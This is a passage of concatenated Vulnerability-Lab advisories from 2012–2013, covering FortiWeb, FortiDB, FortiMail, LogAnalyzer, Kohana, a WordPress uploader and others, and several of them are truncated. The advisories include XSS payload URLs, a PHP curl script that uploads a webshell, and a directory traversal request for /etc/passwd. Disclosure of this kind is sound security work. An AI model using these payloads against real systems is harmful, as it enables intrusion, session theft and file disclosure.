/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


Solution:
=
The vulnerability can be prevented by parsing the java number format exception 
output listing  mkey application value.

2012-10-24: Vendor Fix/Patch


Risk:
=
The security risk of the non-persistent cross site scripting vulnerability is 
estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(rem...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities

2012-12-03 Thread Vulnerability Lab

Title:
==
FortiWeb 4kC,3kC,1kC  VA - Cross Site Vulnerabilities


Date:
=
2012-12-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=702


VL-ID:
=
702


Common Vulnerability Scoring System:

2.1


Introduction:
=
FortiWeb web application firewalls protect, balance, and accelerate your web 
applications, databases, and any 
information exchanged between them. Whether you are protecting applications 
delivered over a large enterprise, 
service provider, or cloud-based provider network, FortiWeb appliances will 
reduce deployment time and 
simplify security management. Fortinet s FortiWeb™ has passed ICSA Web 
Application Firewall Certification. 
The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are 
evidence of FortiWeb s commitment 
to uphold the industry s highest security standards. Achieving this 
certification ensures that FortiWeb™ customers 
benefit from best practices in the security industry for all their Web 
application needs.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ )



Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple cross site 
scripting vulnerabilities in 
Fortinets FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C  Virtual Appliance.


Report-Timeline:

2012-10-01: Researcher Notification  Coordination
2012-10-11: Vendor Notification
2012-10-05: Vendor Response/Feedback
2012-11-11: Vendor Fix/Patch
2012-12-01: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortinet
Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C  
Virtual Appliance


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A non persistent cross site scripting vulnerability is detected in Fortinets 
FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C  Virtual Appliance.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with low or medium required user inter action 
and without local privileged application user account. The vulnerability is 
located in the Regular Expression - Validation (pcre_expression/validate) 
module with the bound vulnerable redir and mkey parameters. Successful 
exploitation results in client side account steal, client side phishing  
client-side appliance module context request manipulation.


Vulnerable Module(s):
[+] Regular Expression - Validation Module 
(pcre_expression/validate)

Vulnerable Parameter(s):
[+] redir
[+] mkey


Proof of Concept:
=
The client side cross site scripting vulnerability can be exploited by remote 
attackers without application user account and 
with medium required user interaction. For demonstration or reproduce ...

Code Review: Regular Expression - Validation Module (mkey  redir)

trtd
table class=footer cellpadding=0 cellspacing=0
trtd
input class=button type=button value=Return onclick=if (window.opener) 
{window.close(); 
} else {document.location='/waf/pcre_expression/validate'}
/td/tr
/table
/td/tr
input type=hidden name=mkey size=22 maxlength=22 
value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) 
input type=hidden name=validated value=-1
input type=hidden name=redir value=/success
/form
/table
/td

... or

trtd
table class=footer cellpadding=0 cellspacing=0
trtd
input class=button type=button value=Return onclick=if (window.opener) 
{window.close(); 
} else {document.location='/waf/pcre_expression/validate'}
/td/tr
/table
/td/tr
input type=hidden name=mkey size=22 maxlength=22 
value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) 
input type=hidden name=validated value=-1
input type=hidden name=redir value=/success
/form
/table
/td



PoC:
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/successmkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3Cmkey=0


Solution:
=
The vulnerability can be patched by parsing all mkey and redir success 
parameter requests of the vulnerable Regular Expression - Validation module.

2012-11-11: Vendor Fix/Patch


Risk:
=
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers

Enterpriser16 LoadBalancer v7.1 - Multiple Web Vulnerabilities

2012-12-19 Thread Vulnerability Lab

 failed the validation.
br
'
iframe [PERSISTENT INJECTED SCRIPT CODE!]
' is not a valid IP address.
/em
/p

URL: 
http://loadbalancer.127.0.0.1:8080/lbadmin/config/physicaladv.php?mnp=editsubmnp=epat=1355527441l=e



Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability

2012-12-28 Thread Vulnerability Lab

Title:
==
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability


Date:
=
2012-12-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=792
Vendor: 
http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater


VL-ID:
=
792


Common Vulnerability Scoring System:

1.5


Introduction:
=
LogAnalyzer is part of Adiscon`s MonitorWare line of monitoring applications. 
It runs both under Windows and Unix/Linux. 
The database can be populated by MonitorWare Agent, WinSyslog or EventReporter 
on the Windows side and by rsyslog on 
the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some 
other members of the product line).

(Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ )


Abstract:
=
An independent vulnerability laboratory researcher discovered a cross site 
scripting vulnerability in the log analyzer v3.6.0 web application.


Report-Timeline:

2012-12-20: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Low


Details:

A client side cross-site scripting vulnerability is detected in the LogAnalyzer 
3.6.0 web application.
The vulnerability allows an remote attacker with high required user interaction 
to force client side xss requests.

The vulnerability is located in the asktheoracle.php file with the bound 
vulnerable oracle_query parameter request. 
An attackers can force client side requests to execute arbitrary script code by 
using the oracle_query parameter.

Successful exploitation of the vulnerability results in client side execution 
of inject script, client side phishing,
client side module context manipulation and evil unautorized external redirects.

Vulnerable File(s):
[+] asktheoracle.php

Vulnerable Parameter(s):
[+] oracle_query


Proof of Concept:
=
The client side cross site scripting vulnerability can be exploited by remote 
attackers with medium or high required user interaction 
and without privileged application user account.

http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstroracle_query=[CLIENT
 SIDE SCRIPT CODE!]

Note: The 'oracle_query' parameter didn't sanitize properly for 
asktheoracle.php page.


Solution:
=
Upgrade to the latest version of Log Analyzer 3.6.1


Risk:
=
The security risk of the client side cross site scripting web vulnerability is 
estimated as low(+)


Credits:

Mohd Izhar Ali - [http://johncrackernet.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability

2012-12-28 Thread Vulnerability Lab

. 




Risk:
=
The security risk of the persistent web vulnerabilities are estimated as 
medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Wordpress Valums Uploader - File Upload Vulnerability

2013-01-22 Thread Vulnerability Lab

Title:
==
Wordpress Valums Uploader - File Upload Vulnerability


Date:
=
2013-01-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=817


VL-ID:
=
817


Common Vulnerability Scoring System:

7.5


Abstract:
=
The independent laboratory researcher (jingo-bd) discovered a remote file 
upload vulnerability in the Wordpress `Valums Uploader` application.


Report-Timeline:

2013-01-04: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A file upload vulnerability is detected in the Wordpress `Valums Uploader` 
application module.
The vulnerability allows remote attackers to upload files like webshells and 
co. to unauthorized access them after 
the upload to compromise the application system.

The vulnerability is located in the valums uploader module when processing to 
request for uploads via POST.
Attackers can unauthorized upload own files to compromise the web application 
or system dbms.

Exploitation of the file upload vulnerability requires no user interaction and 
can be processed without privileged 
application user account. Successful exploitation of the remote file upload 
vulnerability results in system and dbms compromise.

Vulnerable Module(s):
[+] Valums Uploader


Proof of Concept:
=
The remote vulnerability can be exploited by remote attackers without required 
user interaction and without privileged application user account.
For demonstration or reproduce ...

?php

$uploadfile=bangla.php; 
$ch =
curl_init(http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php;);
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=@$uploadfile));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;

?

Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php


Reference(s): 

http://www.xxx.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php

http://www.xxx.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php

http://www3.xxx.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps


Risk:
=
The security risk of the unauthorized shell upload exploit is estimated as 
high(+).


Credits:

JingoBD - (http://facebook.com/bdcyberarmy)
Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends 
and BANGLADESHI Hacker Team.


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT

nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities

2013-01-29 Thread Vulnerability Lab

[PERSISTENT/NON-PERSISTENT
 INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
   

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]


1.2
The server-side (persistent) web vulnerability can be exploited by remote 
attackers and local privileged application user accounts with 
low user interaction. For demonstration or reproduce ...

PoC:
[VALID IP]%20'+%20[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20[PERSISTENT SCRIPT CODE!]+...


Solution:
=
Parse the exception-handling error output listing and disallow error echos with 
requested web context.
To fix the vulnerability parse the context of the input fields in the add 
devices module. Restrict the the input fields with a secure filter mask. 
Parse also the name  ip scan index output listing and restrict the input of 
the requested web context scan listing.

2012-01-28: Vendor Fix/Patch by nCricle Dev


Risk:
=
1.1
The security risk of the client- and server-side post injection web 
vulnerability in the exception handling and listing is estimated as medium(+).

1.2
The security risk of the persistent input validation vulnerability in the scan 
index listing is estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities

2013-01-29 Thread Vulnerability Lab

/FEAdmin.html#SystemBlackWhiteList


Module: Bounce Verification - Username
URL:
https://209.87.230.132:1443/admin/FEAdmin.html#AsBounceverifyKeyCollection

div id=ext-gen7197 class=ext-mb-contentspan id=ext-gen4185 
class=ext-mb-text
Invalid user name: iframe id=ext-gen19608 [PERSISTENT INJECTED SCRIPT 

CODE!];) = =[PERSISTENT INJECTED SCRIPT CODE!]) /iframe/span



1.2
The persistent vulnerability can be exploited by remote attackers with 
privileged application account and 
low required user inter action. For demonstration or reproduce ...


Module: Upload or Import - Local Certificate - Certificate name
URL:
https://209.87.230.132:1443/admin/FEAdmin.html#SysCertificateDetailCollection

div id=ext-gen38011 class=x-grid3-bodydiv id=ext-gen38041 
class=x-grid3-row x-grid3-row-selected  style=width: 1158px;
table class=x-grid3-row-table 

style=width: 1158px; border=0 cellpadding=0 
cellspacing=0tbodytrtd id=ext-gen38095 class=x-grid3-col 
x-grid3-cell 
x-grid3-td-mkey x-grid3-cell-first  

style=width:248px; tabindex=0div id=ext-gen38036 
class=x-grid3-cell-inner x-grid3-col-mkey 
unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
NAME!]/div/td
td class=x-grid3-col x-grid3-cell x-grid3-td-subject  style=width: 726px; 
tabindex=0div id=ext-gen38068 
class=x-grid3-cell-inner x-grid3-

col-subject unselectable=on/[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
VIA INFORMATION!]/div/td
td id=ext-gen38085 

class=x-grid3-col x-grid3-cell x-grid3-td-status  style=width:148px; 
tabindex=0div id=ext-gen38086 class=x-grid3-cell-inner 
x-grid3-col-status 

unselectable=onOK/div/tdtd id=ext-gen38084 class=x-grid3-col 
x-grid3-cell x-grid3-td-isReferenced x-grid3-cell-last  
style=width:28px; tabindex=0div 

class=x-grid3-cell-inner x-grid3-col-isReferenced unselectable=onimg 
src=images/gray-ball.png alt=0 align=absmiddle 

border=0/div/td/tr/tbody/table/divdiv id=ext-gen38040 
class=x-grid3-row x-grid3-row-alt  style=width: 1158px;
table class=x-grid3-row-table 

style=width: 1158px; border=0 cellpadding=0 
cellspacing=0tbodytrtd class=x-grid3-col x-grid3-cell x-grid3-td-mkey 
x-grid3-cell-first  

style=width:248px; tabindex=0div id=ext-gen38037 
class=x-grid3-cell-inner x-grid3-col-mkey 
unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
NAME!]/div/td
td class=x-grid3-col x-grid3-cell x-grid3-td-subject  style=width: 726px; 
tabindex=0div id=ext-gen38039 
class=x-grid3-cell-inner x-grid3-

col-subject unselectable=on[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
VIA INFORMATION!]/div/tdtd class=x-grid3-col x-grid3-cell 
x-grid3-td-status  
style=width:148px; tabindex=0div 

id=ext-gen38102 class=x-grid3-cell-inner x-grid3-col-status 
unselectable=onDefault/div/tdtd id=ext-gen38101 class=x-grid3-col 
x-grid3-cell x-grid3-td-

isReferenced x-grid3-cell-last  style=width:28px; tabindex=0div 
id=ext-gen38083 class=x-grid3-cell-inner x-grid3-col-isReferenced 
unselectable=onimg 

id=ext-gen38100 src=images/red-ball.png alt=1 align=absmiddle 
border=0/div/td/tr/tbody/table/div/div



Solution:
=
1.1
The exception-handling vulnerability can be fixed by parsing the full content 
without excluding after a close tag. Restrict the input fields to allowed chars.

1.2
The persistent vulnerability in the certificate import/upload module can be 
patched by parsing the certificate name and info input field. 
Do not forget to parse also the vulnerable output listing of the certificate 
name and cert information.


Risk:
=
The security risk of the of the exception-handling and input filter bypass 
vulnerability is estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability

Kohana Framework v2.3.3 - Directory Traversal Vulnerability

2013-01-29 Thread Vulnerability Lab

Title:
==
Kohana Framework v2.3.3 - Directory Traversal Vulnerability


Date:
=
2013-01-27


References:
===
http://www.vulnerability-lab.com/get_content.php?id=841


VL-ID:
=
837


Common Vulnerability Scoring System:

7.1


Introduction:
=
Kohana is an open source, object oriented MVC web framework built using PHP5 by 
a team of volunteers that aims to be 
swift, secure, and small. (copy from vendor website) This is an OOP framework 
that is extremely DRY. Everything is built 
using strict PHP 5 classes and objects. Many common components are included: 
translation tools, database access, code 
profiling, encryption, validation, and more.

Extending existing components and adding new libraries is very easy. Uses the 
BSD license, so you can use and modify it for 
commercial purposes. Benchmarking a framework is hard and rarely reflects the 
real world, but Kohana is very efficient and 
carefully optimized for real world usage. Very well commented code and a simple 
routing structure makes it easy to understand 
what is happening. Simple and effective tools help identify and solve 
performance issues quickly.

(Copy of the Vendor Homepage: http://kohanaframework.org/ )



Abstract:
=
The Vulnerability Laboratory Research Team discovered a Directory Traversal web 
vulnerability in the Kohana v2.3.3 Content Management System.


Report-Timeline:

2013-01-27: Public Disclosure


Status:

Published


Affected Products:
==
Kohana
Product: Framework - Content Management System 2.3.3


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A Directory Traversal web vulnerability is detected in the Kohana Content 
Management System web application.
The vulnerability allows remote attackers to request local directories and 
files of the web server application system.

The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` 
file in line 90 when processing to request 
the path dir via replace. The filter replaces `../` by null and it applies on 
file reading requests. 

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
-uri(array(
'action' = 'thumb',
'path'   = str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), 
$filename)
));

Remote attackers can bypass the validation with the vulnerable replace function 
in the file browser to read local 
web server files via directory (path) traversal attack.

Exploitaton of the vulnerability requires no privileged application user 
account and no user interaction.
Successful exploitation of the vulnerability results in read of arbitrary 
system files to compromise web server.

Vulnerable Module(s):
[+] Filebrowser

Vulnerable Function(s):
[+] str_replace  dir

Vulnerable Parameter(s): 
[+] ?path


Proof of Concept:
=
The vulnerability can be exploited by remote attackers without privileged 
application user account and without required user interaction.
For demonstration or reproduce ...

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
-uri(array(
'action' = 'thumb',
'path'   = str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), 
$filename)
));


Review: GET Request
GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..
%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 
HTTP/1.0
Host: media.[server].com
User-Agent: Kami VL


PoC: 
http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd
 


Risk:
=
The security risk of the directory traversal web vulnerability is estimated as 
high(+).
 


Credits:

Vulnerability Laboratory [Research Team]  - Karim B. 
(k...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
